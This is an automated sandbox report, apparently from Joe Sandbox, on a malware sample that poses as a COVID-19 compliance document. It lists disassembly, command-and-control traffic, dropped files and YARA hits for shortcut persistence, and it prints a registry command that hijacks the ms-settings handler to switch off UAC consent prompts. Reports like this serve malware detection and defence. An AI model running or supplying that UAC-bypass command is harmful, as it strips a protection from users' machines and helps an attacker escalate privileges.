Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]15_3_0241049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-1Ch]15_3_0241049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-10h]15_3_0241049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-18h]15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-04h]15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea ecx, dword ptr [ebp-08h]15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-1Ch]15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-10h]15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, ebx15_3_02400B42
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-04h], 00000000h15_3_02400B42
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then push 00000000h15_3_02400B42
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-08h], 00000000h15_3_02400B42
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, ebx15_3_02400B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-04h], 00000000h15_3_02400B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then push 00000000h15_3_02400B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-08h], 00000000h15_3_02400B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]15_3_02400B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 20h15_3_0240040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 00000080h15_3_0240040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 10h15_3_0240040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 04h15_3_0240040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 02h15_3_0240040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 08h15_3_0240040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 01h15_3_0240040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-18h]15_3_02400D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-04h]15_3_02400D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]15_3_02400D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]15_3_02400D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea ecx, dword ptr [ebp-08h]15_3_02400D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]15_3_02400D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-1Ch]15_3_02400D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-10h]15_3_02400D28
Source: global trafficTCP traffic: 192.168.2.4:49756 -> 216.38.7.225:7082
Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknownDNS traffic detected: queries for: discord.com
Source: Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeString found in binary or memory: Http://gorohov.narod.ru
Source: Xbuhnek.exeString found in binary or memory: https://discord.com/
Source: Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe, 00000000.00000003.669929024.00000000022D0000.00000004.00000001.sdmp, Xbuhnek.exe, 0000000E.00000003.794136357.00000000023E8000.00000004.00000001.sdmp, Xbuhnek.exe, 0000000F.00000003.811712369.00000000023FC000.00000004.00000001.sdmpString found in binary or memory: https://discord.com/S
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443

System Summary:

barindex
Initial sample is a PE file and has a suspicious nameShow sources
Source: initial sampleStatic PE information: Filename: Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 14_3_0235845814_3_02358458
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 14_3_0235845814_3_02358458
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 14_3_0235845814_3_02358458
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 14_3_0235845814_3_02358458
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 14_3_023F059D14_3_023F059D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 15_3_0241059D15_3_0241059D
Source: Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeStatic PE information: invalid certificate
Source: Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Xbuhnek.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f
Source: 00000000.00000003.709710666.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.709710666.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.707937961.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.707937961.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.710515160.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.710515160.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.710590049.0000000002A44000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.710590049.0000000002A44000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.710419486.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.710419486.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.709786166.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.709786166.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.708660813.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.708660813.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.707275364.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.707275364.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.706313231.0000000002A88000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.706313231.0000000002A88000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.710144985.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.710144985.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.707371379.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.707371379.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.707195692.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.707195692.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.710335452.0000000002A74000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\hubX.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\hubX.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\hubX.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: classification engineClassification label: mal84.evad.winEXE@17/9@6/5
Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_5048784E GetDiskFreeSpaceA,6_2_5048784E
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Xbuhzxs[1]Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMutant created: \Sessions\1\BaseNamedObjects\winon-9DYKLX
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6004:120:WilError_01
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMetadefender: Detection: 18%
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeFile read: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe 'C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe'
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.batJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /fJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A4A22C push 00406568h; ret 0_3_02A4A250
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A45210 push 00406568h; ret 0_3_02A452B4
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A3DA5C push 00406568h; ret 0_3_02A3DA80
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A55B14 push 00405CF5h; ret 0_3_02A55B19
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A5786C push ecx; mov dword ptr [esp], eax0_3_02A5786D
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A5618C push 00406568h; ret 0_3_02A5638C
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A49994 push 00405CF5h; ret 0_3_02A499DD
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A3D1C4 push 00405CF5h; ret 0_3_02A3D20D
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A45164 push 00406568h; ret 0_3_02A452B4
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A46794 push ecx; mov dword ptr [esp], eax0_3_02A46795
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A4B730 push ecx; mov dword ptr [esp], eax0_3_02A4B731
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A49F1C push 00406258h; ret 0_3_02A49F40
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A3EF60 push ecx; mov dword ptr [esp], eax0_3_02A3EF61
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A3D74C push 00406258h; ret 0_3_02A3D770
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A3D4A4 push 00405FB0h; ret 0_3_02A3D4C8
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A49CAC push 00405FE8h; ret 0_3_02A49CD0
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A3D4DC push 00405FE8h; ret 0_3_02A3D500
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A49C74 push 00405FB0h; ret 0_3_02A49C98
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeCode function: 0_3_02A36594 push eax; ret 0_3_02A365D0
Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_504878E8 push ecx; mov dword ptr [esp], eax6_2_504878E9
Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_50486192 push 504861C0h; ret 6_2_504861B8
